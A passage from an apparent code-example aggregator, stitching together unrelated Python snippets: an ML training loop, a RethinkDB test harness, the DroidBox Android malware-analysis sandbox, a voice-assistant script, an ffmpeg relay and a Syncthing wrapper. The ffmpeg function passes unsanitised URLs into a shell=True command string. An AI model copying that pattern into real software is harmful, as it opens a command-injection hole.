        train_time = datetime.timedelta(seconds=end - start)
        metrics['train_time'] = str(train_time)
        return metrics

    def validate_epoch(self, dl: DataLoader) -> MetricDict:
        """Validate for a single epoch."""
        start = time.time()
        self.model.eval()
        num_samples = 0
        outputs = []
        with torch.no_grad():
            with click.progressbar(dl, label='Validating') as bar:
                for batch_ind, (x, y) in enumerate(bar):
                    x = self.to_device(x, self.device)
                    y = self.to_device(y, self.device)
                    batch = (x, y)
                    output = self.validate_step(batch, batch_ind)
                    outputs.append(output)
                    num_samples += x.shape[0]
        end = time.time()
        validate_time = datetime.timedelta(seconds=end - start)

        metrics = self.validate_end(outputs, num_samples)
        metrics['valid_time'] = str(validate_time)
        return metrics

    def overfit(self):
        """Optimize model using the same batch repeatedly."""
        self.on_overfit_start()

        x, y = next(iter(self.train_dl))
        x = self.to_device(x, self.device)
        y = self.to_device(y, self.device)
        batch = (x, y)

        with click.progressbar(range(self.cfg.solver.overfit_num_steps),
                               label='Overfitting') as bar:
            for step in bar:
                # Reset gradients each step so they don't accumulate
                self.opt.zero_grad()
                loss = self.train_step(batch, step)['train_loss']
                loss.backward()
                self.opt.step()

                if (step + 1) % 25 == 0:
                    log.info('\nstep: {}'.format(step))
                    log.info('train_loss: {}'.format(loss))

        torch.save(self.model.state_dict(), self.last_model_path)

    def train(self):
        """Training loop that will attempt to resume training if appropriate."""
        self.on_train_start()

        if self.start_epoch > 0 and self.start_epoch <= self.cfg.solver.num_epochs:
            log.info('Resuming training from epoch {}'.format(
                self.start_epoch))

        for epoch in range(self.start_epoch, self.cfg.solver.num_epochs):
            log.info('epoch: {}'.format(epoch))
            train_metrics = self.train_epoch()
            if self.epoch_scheduler:
                self.epoch_scheduler.step()
            valid_metrics = self.validate_epoch(self.valid_dl)
            metrics = dict(epoch=epoch, **train_metrics, **valid_metrics)
            log.info('metrics: {}'.format(metrics))

            self.on_epoch_end(epoch, metrics)

    def on_overfit_start(self):
        """Hook that is called at start of overfit routine."""
        pass

    def on_train_start(self):
        """Hook that is called at start of train routine."""
        pass

    def on_epoch_end(self, curr_epoch, metrics):
        """Hook that is called at end of epoch.

        Writes metrics to CSV and TB, and saves model.
        """
        if not isfile(self.log_path):
            with open(self.log_path, 'w') as log_file:
                log_writer = csv.writer(log_file)
                row = self.metric_names
                log_writer.writerow(row)

        with open(self.log_path, 'a') as log_file:
            log_writer = csv.writer(log_file)
            row = [metrics[k] for k in self.metric_names]
            log_writer.writerow(row)

        if self.cfg.log_tensorboard:
            for key, val in metrics.items():
                if isinstance(val, numbers.Number):
                    self.tb_writer.add_scalar(key, val, curr_epoch)
            for name, param in self.model.named_parameters():
                self.tb_writer.add_histogram(name, param, curr_epoch)
            self.tb_writer.flush()

        torch.save(self.model.state_dict(), self.last_model_path)

        if (curr_epoch + 1) % self.cfg.solver.sync_interval == 0:
            self.sync_to_cloud()

    def eval_model(self, split: str):
        """Evaluate model using a particular dataset split.

        Gets validation metrics and saves them along with prediction plots.

        Args:
            split: the dataset split to use: train, valid, or test.
        """
        log.info('Evaluating on {} set...'.format(split))
        dl = self.get_dataloader(split)
        metrics = self.validate_epoch(dl)
        log.info('metrics: {}'.format(metrics))
        json_to_file(metrics,
                     join(self.output_dir, '{}_metrics.json'.format(split)))
        self.plot_predictions(split)
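
To make the abstract interface above concrete, here is a minimal sketch of a classification subclass. ClassificationLearner, its toy model, and the loss choice are illustrative, not part of the original; nn.LazyLinear requires a reasonably recent PyTorch.

class ClassificationLearner(Learner):
    def build_model(self) -> nn.Module:
        # Illustrative stand-in; a real subclass would build from self.cfg.model
        num_classes = len(self.cfg.data.class_names)
        return nn.Sequential(nn.Flatten(), nn.LazyLinear(num_classes))

    def train_step(self, batch: any, batch_ind: int) -> MetricDict:
        x, y = batch
        out = self.post_forward(self.model(x))
        # Summed (not averaged) so train_end() can divide by num_samples
        return {'train_loss': nn.functional.cross_entropy(out, y, reduction='sum')}

    def validate_step(self, batch: any, batch_ind: int) -> MetricDict:
        x, y = batch
        out = self.post_forward(self.model(x))
        return {'val_loss': nn.functional.cross_entropy(out, y, reduction='sum')}

    def prob_to_pred(self, x: Tensor) -> Tensor:
        return x.argmax(dim=1)

    def plot_xyz(self, ax, x: Tensor, y, z=None):
        ax.imshow(x.permute(1, 2, 0))
        title = 'gt: {}'.format(y) if z is None else 'gt: {} / pred: {}'.format(y, z)
        ax.set_title(title)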
Example #49
0
class RethinkDBTestServer(object):
    def __init__(self,
                 server_build_dir=None,
                 use_default_port=False,
                 cache_size=1024,
                 data_dir='./'):
        self.server_build_dir = server_build_dir
        self.use_default_port = use_default_port
        self.cache_size = cache_size
        self.data_dir = data_dir

    # Implement `with` methods to ensure proper lifetime management
    def __enter__(self):
        self.start()
        return self

    def __exit__(self, *args):
        self.stop()

    # Find a free port to bind to
    def find_available_port(self):
        max_loop = 10
        for i in xrange(max_loop):
            port = random.randint(1025, 65535)
            if self.port_available(port):
                return port
        raise Exception("""Wow, you must have won the lottery or something.
                           Ten random ports and they're all occupied""")

    # Test if a given port is free
    def port_available(self, port):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.bind(("127.0.0.1", port))
            s.close()
        except socket.error:
            return False
        return True
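    # Note: this probe is inherently racy -- another process can grab the
    # port between the check and the later bind. A common alternative is to
    # bind to port 0 and let the OS pick a free port:
    #   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    #   s.bind(("127.0.0.1", 0))
    #   port = s.getsockname()[1]
    #   s.close()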

    def start(self):
        if self.use_default_port:
            self.cpp_port = 28015
        else:
            self.cpp_port = self.find_available_port()
        self.cluster_port = self.find_available_port()
        directory, log_out = self.create(self.data_dir)

        self.cpp_server = Popen([
            self.executable, 'serve', '--driver-port',
            str(self.cpp_port), '--directory', directory, '--http-port', '0',
            '--cache-size',
            str(self.cache_size), '--cluster-port',
            str(self.cluster_port)
        ],
                                stdout=log_out,
                                stderr=log_out)
        sleep(2)

        return self.cluster_port

    # Join a cluster headed by a server previously invoked with start
    def join(self, cluster_port):
        self.cpp_port = self.find_available_port()
        self.cluster_port = self.find_available_port()
        directory, log_out = self.create(self.data_dir)
        self.cpp_server = Popen([
            self.executable, 'serve', '--driver-port',
            str(self.cpp_port), '--cluster-port',
            str(self.cluster_port), '--directory', directory, '--http-port',
            '0', '--join',
            'localhost:%d' % cluster_port
        ],
                                stdout=log_out,
                                stderr=log_out)
        sleep(2)

    def create(self, data_dir):
        directory = data_dir + 'run/server_%s/' % self.cpp_port
        rdbfile = directory + 'rdb'
        call(['mkdir', '-p', directory])
        self.log_file = directory + 'server-log.txt'
        log_out = open(self.log_file, 'a')
        self.executable = os.path.join(
            self.server_build_dir or os.getenv('RETHINKDB_BUILD_DIR')
            or '../../build/debug', 'rethinkdb')
        call([self.executable, 'create', '--directory', rdbfile],
             stdout=log_out,
             stderr=log_out)
        return rdbfile, log_out

    def stop(self):
        code = self.cpp_server.poll()
        if code is None:
            self.cpp_server.terminate()
            code = self.cpp_server.wait()
        if code != 0:
            raise Exception(
                "Error: rethinkdb process %d failed with error code %d\n%s" %
                (self.cpp_server.pid, code, open(self.log_file).read()))
        sleep(0.1)

    def restart(self):
        self.stop()
        self.start()

    def alive(self):
        return self.cpp_server.poll() is None
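
A usage sketch for the class above, assuming a rethinkdb binary is discoverable via server_build_dir or the RETHINKDB_BUILD_DIR environment variable (the two-node layout is illustrative):

with RethinkDBTestServer(data_dir='./') as head:
    # Attach a second node to the cluster started by `head`
    peer = RethinkDBTestServer(data_dir='./')
    peer.join(head.cluster_port)
    assert head.alive() and peer.alive()
    peer.stop()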
Example #50
0
class DroidBox(object):
    def __init__(self, output_dir=None):
        self.sendsms = {}
        self.phonecalls = {}
        self.cryptousage = {}
        self.dexclass = {}
        self.dataleaks = {}
        self.opennet = {}
        self.sendnet = {}
        self.recvnet = {}
        self.closenet = {}
        self.fdaccess = {}
        self.servicestart = {}
        self.accessedfiles = {}
        self.enabled = True

        self.adb = None

        self.application = None
        self.apk_name = None
        self.apk_hashes = None
        self.applicationStarted = 0

        self.is_counting_logs = False
        self.timer = None

        if output_dir:
            self.output_dir = output_dir
            if not os.path.exists(self.output_dir):
                os.mkdir(self.output_dir)
        else:
            # Possibly no output files will be generated
            self.output_dir = None

    def set_apk(self, apk_name):
        if not self.enabled:
            return
        if apk_name is None:
            return
        # Does the APK file exist?
        if not os.path.isfile(apk_name):
            print("File %s not found" % apk_name)
            sys.exit(1)

        self.apk_name = os.path.abspath(apk_name)

        self.application = Application(apk_name)
        ret = self.application.processAPK()

        # Error during the APK processing?
        if ret == 0:
            print("Failed to analyze the APK. Terminating the analysis.")
            sys.exit(1)

        main_activity = self.application.getMainActivity()
        package_name = self.application.getPackage()
        self.apk_hashes = self.application.getHashes()

        # No main activity found? Return an error
        if main_activity is None:
            print("No activity to start. Terminating the analysis.")
            sys.exit(1)

        # No package identified? Return an error
        if package_name is None:
            print("No package found. Terminating the analysis.")
            sys.exit(1)

        # Execute the application
        call(["adb", "logcat", "-c"])
        ret = call([
            'monkeyrunner', 'monkeyrunner.py', apk_name, package_name,
            main_activity
        ],
                   stderr=PIPE,
                   cwd=os.path.dirname(os.path.realpath(__file__)))

        if ret == 1:
            print("Failed to execute the application.")
            sys.exit(1)

        print("Starting the activity %s..." % main_activity)

        # By default the application has not started
        self.applicationStarted = 0
        stringApplicationStarted = "Start proc %s" % package_name

        # Open the adb logcat
        if self.adb is None:
            self.adb = Popen([
                "adb", "logcat", "DroidBox:W", "dalvikvm:W",
                "ActivityManager:I"
            ],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE)

        # Wait for the application to start
        while True:
            try:
                logcatInput = self.adb.stdout.readline()
                if not logcatInput:
                    raise Exception("We have lost the connection with ADB.")

                # Application started?
                if stringApplicationStarted in logcatInput:
                    self.applicationStarted = 1
                    break
            except Exception:
                break

        if self.applicationStarted == 0:
            print("Analysis has not been done.")
            # Kill ADB, otherwise it will never terminate
            os.kill(self.adb.pid, signal.SIGTERM)
            sys.exit(1)

        print("Application started")

    def start_unblocked(self, duration=0):
        droidbox_thread = threading.Thread(target=self.start_blocked,
                                           args=(duration, ))
        droidbox_thread.start()

    def stop(self):
        self.enabled = False
        if self.timer and self.timer.isAlive():
            self.timer.cancel()
        if self.adb is not None:
            self.adb.terminate()
            self.adb = None

    def start_blocked(self, duration=0):
        if not self.enabled:
            return
        # curses.setupterm()
        # sys.stdout.write(curses.tigetstr("clear"))
        sys.stdout.flush()
        call(["adb", "wait-for-device"])
        call(['adb', 'logcat', '-c'])

        print " ____                        __  ____"
        print "/\  _`\               __    /\ \/\  _`\\"
        print "\ \ \/\ \  _ __  ___ /\_\   \_\ \ \ \L\ \   ___   __  _"
        print " \ \ \ \ \/\`'__\ __`\/\ \  /'_` \ \  _ <' / __`\/\ \/'\\"
        print "  \ \ \_\ \ \ \/\ \L\ \ \ \/\ \L\ \ \ \L\ \\ \L\ \/>  </"
        print "   \ \____/\ \_\ \____/\ \_\ \___,_\ \____/ \____//\_/\_\\"
        print "    \/___/  \/_/\/___/  \/_/\/__,_ /\/___/ \/___/ \//\/_/"

        count = CountingThread()
        count.start()

        timeStamp = time.time()
        if duration:
            self.timer = threading.Timer(duration, self.stop)
            self.timer.start()

        if self.adb is None:
            self.adb = Popen([
                "adb", "logcat", "DroidBox:W", "dalvikvm:W",
                "ActivityManager:I"
            ],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE)

        # Collect DroidBox logs
        self.is_counting_logs = True
        self.lastScreenshot = 0
        while self.enabled:
            try:
                if self.output_dir and (time.time() -
                                        self.lastScreenshot) >= 5:
                    #Take Screenshots every 5 seconds.
                    os.system("adb shell screencap -p | sed 's/\r$//' > %s" % os.path.join(self.output_dir, "screen") \
                              + "_$(date +%Y-%m-%d_%H%M%S).png")
                    self.lastScreenshot = time.time()

                logcatInput = self.adb.stdout.readline()
                if not logcatInput:
                    raise LostADBException(
                        "We have lost the connection with ADB.")

                boxlog = logcatInput.split('DroidBox:')
                if len(boxlog) > 1:
                    try:
                        load = json.loads(decode(boxlog[1]))

                        self.filter_noises(load)

                        # DexClassLoader
                        if load.has_key('DexClassLoader'):
                            load['DexClassLoader']['type'] = 'dexload'
                            self.dexclass[time.time() -
                                          timeStamp] = load['DexClassLoader']
                            count.increaseCount()

                        # service started
                        if load.has_key('ServiceStart'):
                            load['ServiceStart']['type'] = 'service'
                            self.servicestart[time.time() -
                                              timeStamp] = load['ServiceStart']
                            count.increaseCount()

                        # received data from net
                        if load.has_key('RecvNet'):
                            host = load['RecvNet']['srchost']
                            port = load['RecvNet']['srcport']

                            self.recvnet[time.time() -
                                         timeStamp] = recvdata = {
                                             'type': 'net read',
                                             'host': host,
                                             'port': port,
                                             'data': load['RecvNet']['data']
                                         }
                            count.increaseCount()

                        # fdaccess
                        if load.has_key('FdAccess'):
                            self.accessedfiles[load['FdAccess']
                                               ['id']] = hexToStr(
                                                   load['FdAccess']['path'])

                        # file read or write
                        if load.has_key('FileRW'):
                            load['FileRW']['path'] = self.accessedfiles[
                                load['FileRW']['id']]
                            if load['FileRW']['operation'] == 'write':
                                load['FileRW']['type'] = 'file write'
                            else:
                                load['FileRW']['type'] = 'file read'

                            self.fdaccess[time.time() -
                                          timeStamp] = load['FileRW']
                            count.increaseCount()

                        # opened network connection log
                        if load.has_key('OpenNet'):
                            self.opennet[time.time() -
                                         timeStamp] = load['OpenNet']
                            count.increaseCount()

                        # closed socket
                        if load.has_key('CloseNet'):
                            self.closenet[time.time() -
                                          timeStamp] = load['CloseNet']
                            count.increaseCount()

                        # outgoing network activity log
                        if load.has_key('SendNet'):
                            load['SendNet']['type'] = 'net write'
                            self.sendnet[time.time() -
                                         timeStamp] = load['SendNet']

                            count.increaseCount()

                        # data leak log
                        if load.has_key('DataLeak'):
                            my_time = time.time() - timeStamp
                            load['DataLeak']['type'] = 'leak'
                            load['DataLeak']['tag'] = getTags(
                                int(load['DataLeak']['tag'], 16))
                            self.dataleaks[my_time] = load['DataLeak']
                            count.increaseCount()

                            if load['DataLeak']['sink'] == 'Network':
                                load['DataLeak']['type'] = 'net write'
                                self.sendnet[my_time] = load['DataLeak']
                                count.increaseCount()

                            elif load['DataLeak']['sink'] == 'File':
                                load['DataLeak']['path'] = self.accessedfiles[
                                    load['DataLeak']['id']]
                                if load['DataLeak']['operation'] == 'write':
                                    load['DataLeak']['type'] = 'file write'
                                else:
                                    load['DataLeak']['type'] = 'file read'

                                self.fdaccess[my_time] = load['DataLeak']
                                count.increaseCount()

                            elif load['DataLeak']['sink'] == 'SMS':
                                load['DataLeak']['type'] = 'sms'
                                self.sendsms[my_time] = load['DataLeak']
                                count.increaseCount()

                        # sent sms log
                        if load.has_key('SendSMS'):
                            load['SendSMS']['type'] = 'sms'
                            self.sendsms[time.time() -
                                         timeStamp] = load['SendSMS']
                            count.increaseCount()

                        # phone call log
                        if load.has_key('PhoneCall'):
                            load['PhoneCall']['type'] = 'call'
                            self.phonecalls[time.time() -
                                            timeStamp] = load['PhoneCall']
                            count.increaseCount()

                        # crypto api usage log
                        if 'CryptoUsage' in load:
                            load['CryptoUsage']['type'] = 'crypto'
                            self.cryptousage[time.time() -
                                             timeStamp] = load['CryptoUsage']
                            count.increaseCount()
                    except ValueError:
                        pass
            except KeyboardInterrupt:
                break
            except LostADBException:
                break
            except Exception as e:
                print(e)
                continue

        self.is_counting_logs = False
        count.stopCounting()
        count.join()
        # Kill ADB, otherwise it will never terminate
        self.stop()
        self.adb = None

        print(json.dumps(self.get_output()))
        if self.output_dir is None:
            return
        with open(os.path.join(self.output_dir, "analysis.json"),
                  "w") as jsonfile:
            jsonfile.write(
                json.dumps(self.get_output(), sort_keys=True, indent=4))

    def get_output(self):
        # Store the collected events in a dict that the caller can serialize to JSON
        output = dict()

        # Group the collected events by category
        output["dexclass"] = self.dexclass
        output["servicestart"] = self.servicestart

        output["recvnet"] = self.recvnet
        output["opennet"] = self.opennet
        output["sendnet"] = self.sendnet
        output["closenet"] = self.closenet

        output["accessedfiles"] = self.accessedfiles
        output["dataleaks"] = self.dataleaks

        output["fdaccess"] = self.fdaccess
        output["sendsms"] = self.sendsms
        output["phonecalls"] = self.phonecalls
        output["cryptousage"] = self.cryptousage

        output["recvsaction"] = self.application.getRecvsaction()
        output["enfperm"] = self.application.getEnfperm()

        output["hashes"] = self.apk_hashes
        output["apkName"] = self.apk_name
        return output

    def get_counts(self):
        output = dict()

        # Count the collected events per category
        output["dexclass"] = len(self.dexclass)
        output["servicestart"] = len(self.servicestart)

        output["recvnet"] = len(self.recvnet)
        output["opennet"] = len(self.opennet)
        output["sendnet"] = len(self.sendnet)
        output["closenet"] = len(self.closenet)

        output["dataleaks"] = len(self.dataleaks)

        output["fdaccess"] = len(self.fdaccess)
        output["sendsms"] = len(self.sendsms)
        output["phonecalls"] = len(self.phonecalls)
        output["cryptousage"] = len(self.cryptousage)

        output["sum"] = sum(output.values())

        return output

    def filter_noises(self, log):
        """
        filter use less noises from log
        :param log: log of Droidbox in dict format
        :return: boolean
        """
        if isinstance(log, dict):
            # DexClassLoader
            if 'DexClassLoader' in log.keys():
                if log['DexClassLoader']['path'] in DEXCLASSLOADER_EXCLUDED:
                    log.pop('DexClassLoader')

            # fdaccess
            if 'FdAccess' in log.keys():
                for excluded_prefix in FDACCESS_EXCLUDED_PREFIX:
                    if hexToStr(log['FdAccess']['path']).startswith(
                            excluded_prefix):
                        log.pop('FdAccess')
                        break

            # file read or write
            if 'FileRW' in log.keys():
                if log['FileRW']['id'] not in self.accessedfiles.keys():
                    log.pop('FileRW')

        return log
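
A self-contained sketch of the dispatch pattern the parsing loop above relies on: each parsed DroidBox line is routed into a per-category dict keyed by seconds since the analysis started. The sample line is made up for illustration.

import json
import time

timeStamp = time.time()
opennet, sendsms = {}, {}
buckets = {'OpenNet': opennet, 'SendSMS': sendsms}

# One line of DroidBox output, as it might arrive over adb logcat.
raw = '{"OpenNet": {"desthost": "10.0.0.1", "destport": "80"}}'
load = json.loads(raw)
for key, bucket in buckets.items():
    if key in load:
        bucket[time.time() - timeStamp] = load[key]
print(opennet)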
Example #51
0
class Dinoroar:

    action_sub = None
    mqtt_client = None

    def __init__(self):
        run(['/usr/bin/amixer', 'cset', "iface=Mixer,name='Micro'", "0%"])
        story_path = os.path.join(os.path.realpath(os.path.dirname(__file__)),
                                  'stories')
        self.stories = [
            os.path.join(story_path, story) for story in os.listdir(story_path)
        ]
        with open('/etc/snips.toml') as f:
            self.snips_config = toml.load(f)
        with open('/usr/share/snips/assistant/assistant.json') as f:
            self.snips_model = json.load(f)
        self.snips_site = self.snips_config['snips-audio-server'][
            'bind'].split('@')[0]
        self._initialize_mqtt()
        self._initialize_gpio()
        # NOTE: startup_sub is not defined in this excerpt; presumably a
        # module-level Popen started before __init__ runs.
        startup_sub.terminate()

    def _initialize_mqtt(self):
        host = self.snips_config['snips-common']['mqtt'].split(':')[0]
        self.mqtt_client = Client()
        self.mqtt_client.username_pw_set(
            self.snips_config['snips-common']['mqtt_username'],
            self.snips_config['snips-common']['mqtt_password'])
        self.mqtt_client.on_connect = self.mqtt_on_connect
        self.mqtt_client.on_message = self.mqtt_on_message
        i = 0
        while True:
            try:
                self.mqtt_client.connect(host)
            except OSError:
                print("Network not ready. Waiting {} second.".format(2**i))
                time.sleep(2**i)
                i += 1
            else:
                break

    def _initialize_gpio(self):
        GPIO.setmode(GPIO.BCM)
        GPIO.setup(3, GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.add_event_detect(3, GPIO.FALLING)
        GPIO.add_event_callback(3, self.button_pressed)

    def mqtt_on_connect(self, client, userdata, flags, rc):
        client.subscribe("hermes/#")

    def mqtt_on_message(self, client, userdata, message):
        topic = message.topic
        payload = message.payload
        if topic == "hermes/asr/startListening":
            self.listening_started()
        elif topic == "hermes/asr/stopListening":
            self.listening_stopped()
        elif re.match("hermes/intent/.+", topic):
            self.process_intent(json.loads(payload.decode()))

    def listening_started(self):
        run(['/usr/bin/amixer', 'cset', "iface=Mixer,name='Micro'", "70%"])

    def listening_stopped(self):
        run(['/usr/bin/amixer', 'cset', "iface=Mixer,name='Micro'", "0%"])

    def process_intent(self, message):
        if message['intent']['intentName'] == 'jzylks:ReadStory':
            story = random.choice(self.stories)
            self.action_sub = Popen(['mpg123', story],
                                    stdout=PIPE,
                                    stderr=PIPE)

    def button_pressed(self, event):
        if self.action_sub:
            self.action_sub.terminate()
            self.action_sub = None
            return
        message = {
            'siteId': self.snips_site,
            'modelId': self.snips_model['id'],
            'modelVersion': self.snips_model['version']['nluModel'],
            'modelType': 'universal',
            'currentSensitivity': 0.5
        }
        self.mqtt_client.publish('hermes/hotword/default/detected',
                                 json.dumps(message))

    def listen(self):
        self.mqtt_client.loop_forever()
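
The connect loop in _initialize_mqtt above backs off exponentially but without an upper bound. A self-contained sketch of the same pattern with a cap added for safety (the cap is not part of the original):

import time

def connect_with_backoff(connect, max_delay=64):
    """Retry connect() on OSError, doubling the wait up to max_delay."""
    delay = 1
    while True:
        try:
            connect()
        except OSError:
            print("Network not ready. Waiting %d seconds." % delay)
            time.sleep(delay)
            delay = min(delay * 2, max_delay)
        else:
            return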
Example #52
0
    def run_ffmpeg(self, channel_id, pull_url, push_url):
        publish_cmd = 'ffmpeg -loglevel 24 -stats -i %s -c copy -bsf:a aac_adtstoasc -f flv "%s"' % (
            pull_url, push_url)
        logging.info("publish cmd is %s" % publish_cmd)

        ret = -1
        for i in range(self.max_retries):
            try:
                proc = Popen(publish_cmd,
                             shell=True,
                             executable="/bin/bash",
                             stdout=PIPE,
                             stderr=PIPE)

                flags = fcntl.fcntl(proc.stdout.fileno(), fcntl.F_GETFL)
                fcntl.fcntl(proc.stdout.fileno(), fcntl.F_SETFL,
                            flags | os.O_NONBLOCK)

                flags = fcntl.fcntl(proc.stderr.fileno(), fcntl.F_GETFL)
                fcntl.fcntl(proc.stderr.fileno(), fcntl.F_SETFL,
                            flags | os.O_NONBLOCK)

                last_report_time = time.time()
                while proc.poll() is None:
                    try:
                        logging.debug("channel[%s]: %s" %
                                      (channel_id, proc.stdout.readline()))
                        last_report_time = time.time()
                    except (IOError, OSError):
                        if time.time() - last_report_time > 10:
                            # ffmpeg may be hung; terminate it.
                            proc.terminate()
                        time.sleep(1)

                    try:
                        logging.info("channel[%s]: %s" %
                                     (channel_id, proc.stderr.readline()))
                        last_report_time = time.time()
                    except (IOError, OSError):
                        # no stderr data available yet
                        continue

                #save the return code
                ret = proc.returncode

                #save the log
                while True:
                    try:
                        line = proc.stdout.readline()
                        if not line:
                            break
                        logging.debug("channel[%s]: %s" % (channel_id, line))
                    except:
                        break

                while True:
                    try:
                        line = proc.stderr.readline()
                        if not line:
                            break
                        logging.info("channel[%s]: %s" % (channel_id, line))
                    except:
                        break

                #get ffmpeg return code
                ret = proc.returncode
                if ret != 0:
                    logging.error("publish ret: %d, cmd %s, retry..%d" %
                                  (ret, publish_cmd, i))
                    continue
                else:
                    logging.info("publish success, cmd %s" % (publish_cmd))
                    break
            except Exception as e:
                logging.error("run ffmpeg failed. exception: %s" % e)
                ret = -1
        return ret
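
A minimal, self-contained sketch (Python 3, POSIX) of the non-blocking pipe technique used above, with os.read in place of readline; the shell command is only a stand-in:

import fcntl
import os
import time
from subprocess import Popen, PIPE

proc = Popen("for i in 1 2 3; do echo $i; sleep 1; done",
             shell=True, stdout=PIPE)
fd = proc.stdout.fileno()
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)

while proc.poll() is None:
    try:
        chunk = os.read(fd, 4096)   # raises BlockingIOError when empty
        if chunk:
            print("got:", chunk.decode().rstrip())
    except BlockingIOError:
        time.sleep(0.1)             # nothing to read; avoid busy-waiting
# Note: any output still buffered at exit is left undrained in this sketch.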
Example #53
0
class DaemonProcess(GObject.GObject):
    __gsignals__ = {
        # line(text)	- emitted when process outputs full line
        b"line": (GObject.SIGNAL_RUN_FIRST, None, (object, )),
        # exit(code)	- emitted when process exits
        b"exit": (GObject.SIGNAL_RUN_FIRST, None, (int, )),
        # failed(exception) - emitted if process fails to start
        b"failed": (GObject.SIGNAL_RUN_FIRST, None, (object, )),
    }
    SCROLLBACK_SIZE = 500  # Maximum number of output lines stored in memory
    PRIORITY_LOWEST = 19
    PRIORITY_LOW = 10
    PRIORITY_NORMAL = 0
    PRIORITY_HIGH = -10
    PRIORITY_HIGHEST = -20

    def __init__(self, cmdline, priority=PRIORITY_NORMAL, max_cpus=0, env={}):
        """ cmdline should be list of arguments """
        GObject.GObject.__init__(self)
        self.cmdline = cmdline
        self.priority = priority
        self.env = {x: env[x] for x in env}
        self.env["STNORESTART"] = "1"  # see syncthing --help
        self.env["STNOUPGRADE"] = "1"
        if max_cpus > 0:
            self.env["GOMAXPROCS"] = str(max_cpus)
        self._proc = None

    def start(self):
        for x in self.env:
            os.environ[x] = self.env[x]
        try:
            self._cancel = Gio.Cancellable()
            if IS_WINDOWS:
                # Windows
                sinfo = STARTUPINFO()
                sinfo.dwFlags = STARTF_USESHOWWINDOW
                sinfo.wShowWindow = 0
                cflags = nice_to_priority_class(self.priority)
                self._proc = Popen(self.cmdline,
                                   stdin=PIPE,
                                   stdout=PIPE,
                                   stderr=PIPE,
                                   startupinfo=sinfo,
                                   creationflags=cflags)
                self._stdout = WinPopenReader(self._proc.stdout)
                self._check = GLib.timeout_add_seconds(1, self._cb_check_alive)
            elif HAS_SUBPROCESS:
                # New Gio
                flags = Gio.SubprocessFlags.STDOUT_PIPE | Gio.SubprocessFlags.STDERR_MERGE
                if self.priority == 0:
                    self._proc = Gio.Subprocess.new(self.cmdline, flags)
                else:
                    # I just really do hope that there is no distro w/out nice command
                    self._proc = Gio.Subprocess.new(
                        ["nice", "-n", "%s" % self.priority] + self.cmdline,
                        flags)
                self._proc.wait_check_async(None, self._cb_finished)
                self._stdout = self._proc.get_stdout_pipe()
            else:
                # Gio < 3.12 - Gio.Subprocess is missing :(
                if self.priority == 0:
                    self._proc = Popen(self.cmdline, stdout=PIPE)
                else:
                    # still hoping
                    self._proc = Popen(
                        ["nice", "-n", "%s" % self.priority] + self.cmdline,
                        stdout=PIPE)
                self._stdout = Gio.UnixInputStream.new(
                    self._proc.stdout.fileno(), False)
                self._check = GLib.timeout_add_seconds(1, self._cb_check_alive)
        except Exception as e:
            # Startup failed
            self.emit("failed", e)
            return
        self._lines = deque([], DaemonProcess.SCROLLBACK_SIZE)
        self._buffer = ""
        self._stdout.read_bytes_async(256, 0, self._cancel, self._cb_read, ())

    def _cb_read(self, pipe, results, *a):
        """ Handler for read_bytes_async """
        try:
            response = pipe.read_bytes_finish(results)
        except Exception as e:
            if not self._cancel.is_cancelled():
                log.exception(e)
                GLib.idle_add(pipe.read_bytes_async, 256, 1, None,
                              self._cb_read)
            return
        response = response.get_data().decode('utf-8')
        self._buffer = "%s%s" % (self._buffer, response)
        while "\n" in self._buffer:
            line, self._buffer = self._buffer.split("\n", 1)
            self._lines.append(line)
            self.emit('line', line)
        if not self._cancel.is_cancelled():
            GLib.idle_add(pipe.read_bytes_async, 256, 1, None, self._cb_read,
                          ())

    def _cb_check_alive(self, *a):
        """
		Repeatedly check if process is still alive.
		Called only on windows
		"""
        if self._proc == None:
            # Never started or killed really fast
            self.emit('exit', 1)
            self._cancel.cancel()
            if IS_WINDOWS: self._stdout.close()
            return False
        self._proc.poll()
        if self._proc.returncode is None:
            # Repeat until finished or canceled
            return (not self._cancel.is_cancelled())
        # Child just died :)
        self.emit('exit', self._proc.returncode)
        self._cancel.cancel()
        if IS_WINDOWS: self._stdout.close()
        return False

    def _cb_finished(self, proc, results):
        """
		Callback for wait_check_async.
		With Gio < 3.12, timer and _cb_check_alive is used.
		"""
        try:
            proc.wait_check_finish(results)
            log.info("Subprocess finished with code %s",
                     proc.get_exit_status())
        except GLib.GError:
            # Exited with exit code
            log.info("Subprocess exited with code %s", proc.get_exit_status())
        if proc.get_exit_status() == 127:
            # Command not found
            self.emit("failed", Exception("Command not found"))
        else:
            self.emit('exit', proc.get_exit_status())
        if IS_WINDOWS: self._stdout.close()
        self._cancel.cancel()

    def terminate(self):
        """ Terminates process (sends SIGTERM) """
        if not self._proc is None:
            if IS_WINDOWS:
                # Windows
                self._proc.terminate()
            elif HAS_SUBPROCESS:
                # Gio.Subprocess
                self._proc.send_signal(15)
            else:
                # subprocess.Popen
                self._proc.terminate()
            self._proc = None
            if IS_WINDOWS: self._stdout.close()
            self._cancel.cancel()

    def kill(self):
        """ Kills process (sends SIGTERM) """
        if not self._proc is None:
            if IS_WINDOWS:
                # Windows - can't actually kill
                self._proc.terminate()
            elif HAS_SUBPROCESS:
                # Gio.Subprocess
                self._proc.force_exit()
            else:
                # subprocess.Popen
                self._proc.kill()
            self._proc = None
            if IS_WINDOWS: self._stdout.close()
            self._cancel.cancel()

    def get_output(self):
        """ Returns process output as iterable list of lines """
        return self._lines

    def get_commandline(self):
        """ Returns commandline used to start process """
        return self.cmdline
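
A usage sketch for the class above under a GLib main loop. The syncthing command line is an assumption (the STNORESTART/STNOUPGRADE variables suggest it is the intended target), and IS_WINDOWS, HAS_SUBPROCESS and log are module globals not shown in the excerpt.

from gi.repository import GLib

daemon = DaemonProcess(["syncthing", "-no-browser"])
daemon.connect("line", lambda d, line: print(line))
daemon.connect("exit", lambda d, code: loop.quit())
daemon.start()

loop = GLib.MainLoop()
loop.run()
print("kept %d lines of scrollback" % len(daemon.get_output()))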
Example #54
0
File: hp.py Project: eddiechantc/hoverpy
class HoverPy:
    def __init__(self,
                 host="localhost",
                 capture=False,
                 proxyPort=8500,
                 adminPort=8888,
                 modify=False,
                 middleware="",
                 dbpath="",
                 db="",
